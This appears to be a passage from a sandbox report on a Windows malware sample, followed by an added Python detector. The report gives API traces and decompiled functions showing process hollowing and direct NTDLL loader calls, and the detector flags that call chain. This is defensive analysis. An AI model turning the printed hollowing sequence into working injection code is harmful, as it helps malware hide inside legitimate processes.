            • String ID:
            • API String ID:
            • Opcode ID: 348556ee60875952d1b353ddc5f2ef97f6264277c173934fb5a6c0ffb2736ff7
            • Instruction ID: a43892d0f1fc751e2312f163d4b39de440685b5976e97a52a0fb587587c89ddc
            • Opcode Fuzzy Hash: 348556ee60875952d1b353ddc5f2ef97f6264277c173934fb5a6c0ffb2736ff7
            • Instruction Fuzzy Hash: 32F0AF7400424D6E93299B719585092BBA4FF82304F611D8EC3825BC62CA3AB893CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 91acaab0455c819429546f4fe30140ad69fd9360310cbf4e3092104b92557cb0
            • Instruction ID: d517fed31536b1fc2a21567abd7de147b63b6840b6cf7dc9692091a0263e9a5e
            • Opcode Fuzzy Hash: 91acaab0455c819429546f4fe30140ad69fd9360310cbf4e3092104b92557cb0
            • Instruction Fuzzy Hash: D4F0C27410421DAE926CDBA0D185092BBA4FFD2304F615D5DC3426BCA2CA3AF853DA82
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b2fd54db6ca68966c6ea549734bc74dc57af9ffe16b4078303ef16f8b7efa8fb
            • Instruction ID: b234b1e164d4dd428b17fdfb9b1103a254be6e4ce54d4f1e89fdf23064b212e5
            • Opcode Fuzzy Hash: b2fd54db6ca68966c6ea549734bc74dc57af9ffe16b4078303ef16f8b7efa8fb
            • Instruction Fuzzy Hash: 15E0C26910150E6E865C8A7195440D2B7D6FFC2240BA12D49C3062BC22893AB883D591
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            APIs
            • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 03280156
            • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0328016C
            • CreateProcessA.KERNELBASE(?,00000000), ref: 03280255
            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03280270
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03280283
            • GetThreadContext.KERNELBASE(00000000,?), ref: 0328029F
            • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 032802C8
            • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 032802E3
            • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 03280304
            • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0328032A
            • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 03280399
            • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 032803BF
            • SetThreadContext.KERNELBASE(00000000,?), ref: 032803E1
            • ResumeThread.KERNELBASE(00000000), ref: 032803ED
            • ExitProcess.KERNEL32(00000000), ref: 03280412
            Memory Dump Source
            • Source File: 00000011.00000002.393732484.0000000003280000.00000040.00000001.sdmp, Offset: 03280000, based on PE: false
            Similarity
            • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
            • String ID:
            • API String ID: 2875986403-0
            • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction ID: ab3a006549da9ace42b61747749d6a9a235efd5f309f4dd47ef2a0ae302ef331
            • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction Fuzzy Hash: 57B1C774A00209AFDB44CF98C895F9EBBB5FF88314F248158E508AB391D771AD85CF94
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 03280533
            Memory Dump Source
            • Source File: 00000011.00000002.393732484.0000000003280000.00000040.00000001.sdmp, Offset: 03280000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
            • API String ID: 716092398-2341455598
            • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction ID: ff99fc012b356ec5fb62cb409ebaf164c2931f03fe3ac8a675d413011039eb53
            • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction Fuzzy Hash: CF510970D09388EAEB11DB98C849BDDBFB6AF11708F148098D5447F2C6C3FA5658CB66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetFileAttributesA.KERNELBASE(apfHQ), ref: 032805EC
            Memory Dump Source
            • Source File: 00000011.00000002.393732484.0000000003280000.00000040.00000001.sdmp, Offset: 03280000, based on PE: false
            Similarity
            • API ID: AttributesFile
            • String ID: apfHQ$o
            • API String ID: 3188754299-2999369273
            • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction ID: 849ab9c255b6addc225baeeea7e161a965a5ecbd113242ee9b6171db2eb8de48
            • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction Fuzzy Hash: 83011270C0525DFADB10DF94C5183ADBFB5AF41308F188099C4052B281D7B69B98CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Memory Dump Source
            • Source File: 00000011.00000002.393732484.0000000003280000.00000040.00000001.sdmp, Offset: 03280000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction ID: 301da2c8975384037121ce8d50e26aa01bd2731ee61c5c5084386f1ce95718e8
            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction Fuzzy Hash: 4811A572351100AFE754DF65DCD1FA673EAFB88220B198155ED08CB351D676EC45C760
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            C-Code - Quality: 46%
            			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
            				intOrPtr _t14;
            				void* _t17;
            				intOrPtr* _t23;
            				void* _t26;
            				void* _t27;
            				void* _t28;
            				signed int _t33;
            				intOrPtr* _t35;
            				void* _t38;
            
            				_t31 = __esi;
            				_t29 = __edi;
            				asm("in eax, 0xe5"); // privileged port-I/O opcode: this listing starts mid-instruction at 0x0040196D inside E00401962 (same addresses from 0x00401973 on), so the first statements are decode noise
            				 *((short*)(__eax + _t33 * 2)) = __esi;
            				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
            				_push(0x1999);
            				_t14 =  *_t35;
            				__eflags = __al;
            				_t26 = 0x5c;
            				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
            				_t23 =  *((intOrPtr*)(_t33 + 8));
            				Sleep(0x1388); // 5000 ms
            				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
            				_t39 = _t17;
            				if(_t17 != 0) {
            					_push( *((intOrPtr*)(_t33 + 0x14)));
            					_push( *((intOrPtr*)(_t33 - 4)));
            					_push(_t17);
            					_push(_t23); // executed
            					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
            				}
            				 *_t23(0xffffffff, 0); // executed: NtTerminateProcess(NtCurrentProcess(), 0), see APIs ref 004019C9
            				_t27 = 0x5c;
            				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
            			}

            Disassembly addresses: 0x0040196d to 0x004019f9

            APIs
            • Sleep.KERNELBASE(00001388), ref: 004019A1
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Memory Dump Source
            • Source File: 00000015.00000002.405212543.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessSleepTerminate
            • String ID: j\Y
            • API String ID: 417527130-662177190
            • Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
            • Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
            • Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
            • Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 44%
            			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
            				char _v8;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t9;
            				void* _t12;
            				void* _t17;
            				intOrPtr* _t18;
            				void* _t20;
            				void* _t21;
            				void* _t22;
            				void* _t23;
            				void* _t24;
            				intOrPtr* _t25;
            				void* _t27;
            
            				_push(0x1999);
            				_t9 =  *_t25;
            				__eflags = __al;
            				_t20 = 0x5c;
            				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
            				_t18 = _a4;
            				Sleep(0x1388); // 5000 ms
            				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
            				_t28 = _t12;
            				if(_t12 != 0) {
            					_push(_a16);
            					_push(_v8);
            					_push(_t12);
            					_push(_t18); // executed
            					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
            				}
            				 *_t18(0xffffffff, 0); // executed: NtTerminateProcess(NtCurrentProcess(), 0), see APIs ref 004019C9
            				_t21 = 0x5c;
            				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
            			}

            Disassembly addresses: 0x00401973 to 0x004019f9

            APIs
            • Sleep.KERNELBASE(00001388), ref: 004019A1
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Memory Dump Source
            • Source File: 00000015.00000002.405212543.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessSleepTerminate
            • String ID:
            • API String ID: 417527130-0
            • Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
            • Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
            • Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
            • Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Memory Dump Source
            • Source File: 00000015.00000002.405212543.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessTerminate
            • String ID:
            • API String ID: 560597551-0
            • Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
            • Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
            • Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
            • Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E004027ED(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
            				struct _OBJDIR_INFORMATION _v8;
            				char _v16;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				void* _t9;
            				long _t12;
            				void* _t16;
            				intOrPtr _t18;
            				intOrPtr _t19;
            				void* _t20;
            				void* _t21;
            				void* _t23;
            				UNICODE_STRING* _t24;
            				intOrPtr* _t25;
            				intOrPtr* _t26;
            
            				_t9 = 0x2824;
            				_t18 =  *_t25;
            				_t26 = _t25 + 4;
            				E004012AB(_t9, _t16, _t18, _t20, _t21, _t23, __eflags);
            				_t17 = _a4;
            				_t24 =  &_v16;
            				 *((intOrPtr*)(_a4 + 0xc))(_t24, _a8, 0x53); // callback at offset 0xc of the context block fills the UNICODE_STRING DLL name
            				_t22 =  &_v8;
            				_t12 = LdrLoadDll(0, 0, _t24,  &_v8); // LdrLoadDll(PathToFile, Flags, ModuleFileName, &ModuleHandle): loaded through ntdll, so no LoadLibrary import is needed
            				_t29 = _t12;
            				if(_t12 != 0) {
            					_v8 = 0; // non-zero NTSTATUS: return a NULL module handle
            				}
            				_push(0x53);
            				_t19 =  *_t26;
            				E004012AB(0x2824, _t17, _t19, _t20, _t22, _t24, _t29);
            				return _v8;
            			}

            Disassembly addresses: 0x00402800 to 0x0040287e

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A
            Memory Dump Source
            • Source File: 00000015.00000001.392942954.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 7b811dfe18a2fa04bac5265394d9a2456aa6afd5894524daffa0ad136d012fbe
            • Instruction ID: 86d1809ebd5855410281f38b9c9c6c09a144d2210cd9b7f1e60e22e0793f0f49
            • Opcode Fuzzy Hash: 7b811dfe18a2fa04bac5265394d9a2456aa6afd5894524daffa0ad136d012fbe
            • Instruction Fuzzy Hash: CD01D43BA08105E7D6007A818A4DF6A7724EB50744F20C137A6077A1C0C5FC9A07E7BB
            Uniqueness

            Uniqueness Score: -1.00%
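
Detection check for two patterns shown above, added here as an example and not part of the Joe Sandbox report or the sample: the process-hollowing call chain listed for the 0x03280000 region (CreateProcessA, NtUnmapViewOfSection, VirtualAllocEx with 0x3000/0x40, NtWriteVirtualMemory/WriteProcessMemory, SetThreadContext, ResumeThread) and the direct NTDLL calls such as the LdrLoadDll at 0x0040283A. The script parses lines in the report's own "API.MODULE(args), ref: ADDR" form. SAMPLE_TRACE is constructed from the lines on this page; the stage list is the standard hollowing sequence and the flag names are the Win32 definitions (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE); the function names parse_trace, find_hollowing and analyze are this example's own.

```python
"""Flag process hollowing and direct NTDLL calls in a sandbox API trace (added example)."""
import re
from collections import namedtuple

# Constructed input in the report's own "API.MODULE(args), ref: ADDR" line format.
# Values are copied from the API lists on this page; "?" is an argument the sandbox
# could not resolve.
SAMPLE_TRACE = """\
• VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 03280156
• GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0328016C
• CreateProcessA.KERNELBASE(?,00000000), ref: 03280255
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03280270
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03280283
• GetThreadContext.KERNELBASE(00000000,?), ref: 0328029F
• ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 032802C8
• NtUnmapViewOfSection.NTDLL(00000000,?), ref: 032802E3
• VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 03280304
• NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0328032A
• NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 03280399
• WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 032803BF
• SetThreadContext.KERNELBASE(00000000,?), ref: 032803E1
• ResumeThread.KERNELBASE(00000000), ref: 032803ED
• ExitProcess.KERNEL32(00000000), ref: 03280412
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A
"""

LINE_RE = re.compile(r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),"
                     r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Standard Win32 constants for the VirtualAllocEx arguments seen in the trace.
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# args: int for hex literals, None for "?", str for anything else (window names etc.)
Call = namedtuple("Call", "api module args ref")


def parse_arg(raw):
    """'?' -> None (unresolved), hex literal -> int, anything else stays text."""
    if raw == "?":
        return None
    return int(raw, 16) if re.fullmatch(r"[0-9A-Fa-f]+", raw) else raw


def parse_trace(text):
    """Turn report lines into Call records; lines that do not match are skipped."""
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        args = [parse_arg(a.strip()) for a in m["args"].split(",") if a.strip()]
        calls.append(Call(m["api"], m["module"].upper(), args, int(m["ref"], 16)))
    return calls


def decode_alloc(value):
    if value is None:
        return "?"
    return "|".join(n for bit, n in ALLOC_TYPE.items() if value & bit) or hex(value)


def decode_protect(value):
    return "?" if value is None else PAGE_PROTECT.get(value & 0xFF, hex(value))


def is_rwx_alloc(c):
    """VirtualAllocEx(hProcess, addr, size, type, protect) with an executable+writable page."""
    return (c.api == "VirtualAllocEx" and len(c.args) >= 5
            and c.args[4] is not None and bool(c.args[4] & 0x40))


# Process hollowing as an ordered chain of stages; every stage must appear, in order.
HOLLOW_STAGES = [
    ("create", lambda c: c.api.startswith("CreateProcess")),
    ("unmap", lambda c: c.api in ("NtUnmapViewOfSection", "ZwUnmapViewOfSection")),
    ("alloc_rwx", is_rwx_alloc),
    ("write", lambda c: c.api in ("WriteProcessMemory", "NtWriteVirtualMemory",
                                  "ZwWriteVirtualMemory")),
    ("set_ctx", lambda c: c.api in ("SetThreadContext", "NtSetContextThread")),
    ("resume", lambda c: c.api in ("ResumeThread", "NtResumeThread")),
]


def find_hollowing(calls):
    """Return {stage: ref} when all stages occur in order, else None."""
    hits, stage = {}, 0
    for c in calls:
        if stage < len(HOLLOW_STAGES) and HOLLOW_STAGES[stage][1](c):
            hits[HOLLOW_STAGES[stage][0]] = c.ref
            stage += 1
    return hits if stage == len(HOLLOW_STAGES) else None


def direct_ntdll_calls(calls):
    """Native and loader calls made straight into NTDLL, bypassing the kernel32 wrappers."""
    return [c for c in calls if c.module == "NTDLL" and c.api.startswith(("Nt", "Zw", "Ldr"))]


def analyze(text):
    calls = parse_trace(text)
    return {
        "calls": len(calls),
        "hollowing": find_hollowing(calls),
        "rwx_allocations": [(hex(c.ref), decode_alloc(c.args[3]), decode_protect(c.args[4]))
                            for c in calls if is_rwx_alloc(c)],
        "direct_ntdll": [(c.api, hex(c.ref)) for c in direct_ntdll_calls(calls)],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_TRACE), indent=2))
```

The ordered-subsequence check deliberately requires both the unmap and the context swap: a trace that only creates a process and writes into it is not reported, which keeps debuggers and installers out of the match. A production rule would also key each stage on the target process handle so that calls against different children are not chained together; the report's trace shows every handle as 00000000 or ?, so this example does not.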

            C-Code - Quality: 94%
            			E0040280A(intOrPtr __ebx, HMODULE* __edi, UNICODE_STRING* __esi, void* __eflags) {
            				void* __ebp;
            				void* _t12;
            				long _t15;
            				intOrPtr _t18;
            				intOrPtr _t19;
            				void* _t20;
            				UNICODE_STRING* _t23;
            				void* _t25;
            				intOrPtr* _t26;
            
            				_t29 = __eflags;
            				_t23 = __esi;
            				_t21 = __edi;
            				_t16 = __ebx;
            				if(__eflags < 0) {
            					if(__eflags >= 0) {
            						__ecx = __ecx + 1;
            						__eflags = __bl;
            						_t12 = 0x2824;
            					} else {
            					}
            					_t19 =  *_t26;
            					_t26 = _t26 + 4;
            					E004012AB(_t12, _t16, _t19, _t20, _t21, _t23, _t29);
            					_t16 =  *((intOrPtr*)(_t25 + 8));
            					_t23 = _t25 - 0xc;
            					 *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + 0xc))(_t23,  *((intOrPtr*)(_t25 + 0xc)), 0x53);
            					_t21 = _t25 - 4;
            					_t15 = LdrLoadDll(0, 0, _t23, _t25 - 4);
            					_t30 = _t15;
            					if(_t15 != 0) {
            						 *(_t25 - 4) = 0;
            					}
            				}
            				_push(0x53);
            				_t18 =  *_t26;
            				E004012AB(0x2824, _t16, _t18, _t20, _t21, _t23, _t30);
            				return  *(_t25 - 4);
            			}

            Disassembly addresses: 0x00402800 to 0x0040287e

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A
            Memory Dump Source
            • Source File: 00000015.00000001.392942954.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 816e61236cf151029f9916b06356fa28e65bf4d83d8dd38ba6b14be9c999f240
            • Instruction ID: 9ca859c839910d9830ac79efeaa13c409ccf86f2f3a4ee59ee812277144ea7f3
            • Opcode Fuzzy Hash: 816e61236cf151029f9916b06356fa28e65bf4d83d8dd38ba6b14be9c999f240
            • Instruction Fuzzy Hash: B901843BA04105E7DA00BA819A4DBAE7764AB50704F10C57BE6077A1C5C6FC9607A76B
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E0040281A(void* __eax, void* __ebx, void* __edi, void* __esi) {
            				long _t12;
            				intOrPtr _t19;
            				intOrPtr _t20;
            				void* _t21;
            				UNICODE_STRING* _t26;
            				void* _t28;
            				intOrPtr* _t30;
            				intOrPtr* _t31;
            				void* _t34;
            
            				_t34 = __eax - 0x90;
            				_t19 =  *_t30;
            				_t31 = _t30 + 4;
            				E004012AB(__eax, __ebx, _t19, _t21, __edi, __esi, _t34);
            				_t17 =  *((intOrPtr*)(_t28 + 8));
            				_t26 = _t28 - 0xc;
            				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), 0x53);
            				_t23 = _t28 - 4;
            				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
            				_t35 = _t12;
            				if(_t12 != 0) {
            					 *(_t28 - 4) = 0;
            				}
            				_push(0x53);
            				_t20 =  *_t31;
            				E004012AB(0x2824, _t17, _t20, _t21, _t23, _t26, _t35);
            				return  *(_t28 - 4);
            			}

            Disassembly addresses: 0x00402812 to 0x0040287e

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A
            Memory Dump Source
            • Source File: 00000015.00000001.392942954.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: ef76625e9fce4a99ac1b5c6db449950ac3397aa5a53fee84dab980023b8c3a58
            • Instruction ID: 04be1964ae6a2c4a8d34668d02d656748d1177ed5934df91e255a91300bf99b4
            • Opcode Fuzzy Hash: ef76625e9fce4a99ac1b5c6db449950ac3397aa5a53fee84dab980023b8c3a58
            • Instruction Fuzzy Hash: 58F0A43AA04105D7DB00BA81CA49B9D7720AB51704F10C57BE6067A1C4C6B99707E76B
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 90%
            			E0040281E(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
            				void* __edi;
            				void* _t9;
            				long _t12;
            				intOrPtr _t20;
            				void* _t21;
            				void* _t22;
            				UNICODE_STRING* _t26;
            				void* _t28;
            				intOrPtr* _t30;
            
            				E004012AB(_t9, __ebx, __ecx, _t21, _t22, __esi, __eflags);
            				_t17 =  *((intOrPtr*)(_t28 + 8));
            				_t26 = _t28 - 0xc;
            				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t28 + 0xc)), _t22);
            				_t23 = _t28 - 4;
            				_t12 = LdrLoadDll(0, 0, _t26, _t28 - 4);
            				_t34 = _t12;
            				if(_t12 != 0) {
            					 *(_t28 - 4) = 0;
            				}
            				_push(0x53);
            				_t20 =  *_t30;
            				E004012AB(0x2824, _t17, _t20, _t21, _t23, _t26, _t34);
            				return  *(_t28 - 4);
            			}

            Disassembly addresses: 0x0040281f to 0x0040287e

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 0040283A
            Memory Dump Source
            • Source File: 00000015.00000001.392942954.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
            • Opcode ID: 65736493afcaf5b803b8217f4f0e2bcb43a663e8f28fff33dac9f311f6d1fd4a
            • Instruction ID: 3fd11184bcf92e870777245e351188805b8424fcd9c3dcde69815370b47807fd
            • Opcode Fuzzy Hash: 65736493afcaf5b803b8217f4f0e2bcb43a663e8f28fff33dac9f311f6d1fd4a
            • Instruction Fuzzy Hash: 9DF0303AA04105E7DB00BA91CA89B9E7770EB51714F10C16BE6067A1C4C6B89707E76B
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions